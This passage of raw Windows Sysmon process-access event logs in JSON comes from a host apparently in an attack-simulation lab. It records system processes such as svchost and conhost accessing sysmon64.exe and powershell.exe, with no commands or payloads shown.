07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5639,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5640,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5641,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5642,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5643,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.299\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.299","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5644,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
